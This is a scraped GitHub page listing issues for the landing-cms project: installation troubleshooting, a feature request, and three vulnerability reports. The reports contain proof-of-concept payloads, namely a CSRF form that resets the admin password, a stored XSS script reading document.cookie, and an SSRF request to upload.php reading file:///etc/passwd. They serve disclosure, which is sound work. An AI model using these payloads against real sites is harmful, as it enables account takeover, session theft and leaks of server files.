Git Product home page Git Product logo

landing-cms's People

Contributors

elias-black avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

landing-cms's Issues

Не могу поставить под Опенсервер

Развернул, При обращении к инсталл все доступы есть,
добавил руками
image

при переходе к cms вот такая штука
image
Хотя по идее должно быть задание пароля. ставил на php 5.6, хотя пробовал и 5.2 результат тот же. Не скажите где не досмотрел?

CMS не устанавливается без пдавления ошибок

Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/public.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\web\index.php on line 24

Warning: file_get_contents(E:\openserver\OpenServer\domains\shpagin.time/cms/_db/password.php): failed to open stream: No such file or directory in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php on line 112

Warning: Cannot modify header information - headers already sent by (output started at E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\db.class.php:112) in E:\openserver\OpenServer\domains\shpagin.time\cms\_classes\utils.class.php on line 37

Landing-CMS has Cross-site request forgery.

http://192.168.18.130/cms/password/

I can change the admin's password when admin click the csrf html file.

payload:

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://192.168.18.130/cms/password/" method="POST">
      <input type="hidden" name="pwd1" value="12345" />
      <input type="hidden" name="pwd2" value="12345" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

图片

Landing-CMS has Storage Cross Site Scripting.

First access the file management page, then click new file to upload the file, select the html file format.

http://192.168.187.2/assets/vendor/responsive_filemanager_9.12.1/filemanager/dialog.php

payload:<script>alert(document.cookie)</scrtipt>

When we input the file content as payload, we find that the front end does not allow input /, so we can capture the package and modify the content or paste the payload directly into the file content.

image

Right-click the file and select "show url", open the file URL to trigger xss.

image

image

image

When the administrator opens the file after uploading the file, it can also trigger xss.

image

image

image

ssrf and Any file read

A SSRF vulnerability was discovered in landing-cms .here is a SSRF vulnerability that allows attackers to read server sensitive information. via /assets/vendor/responsive_filemanager_9.12.1/filemanager/upload.php
post: fldr=test11&url=file:///etc/passwd
wx20180912-184718 2x

wx20180912-185241 2x

and then cos would touch a file named fldr and the name of ssrf file

wx20180912-185443

so attackers can read server sensitive information
wx20180912-185622 2x

Мультиполя

Здравствуйте, Илья!
Ваша CMS просто идеальна, и проста. Это именно то, что я не раз начинал писать, бросал из-за горящих сроков и откладывал в долгий ящик.
Единственное, чего очень не хватает - это реализации мультиполей. Это полезно, когда например на лендинге галерея изображений, или список партнеров, или например каталог продукции.
Это дополнение очень сильно облегчит мне жизнь, поэтому я даже готов отблагодарить финансово.
Так же было бы круто, среди типов полей видеть селекты и выбор файла.
Если что, пишите на почту: [email protected]

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.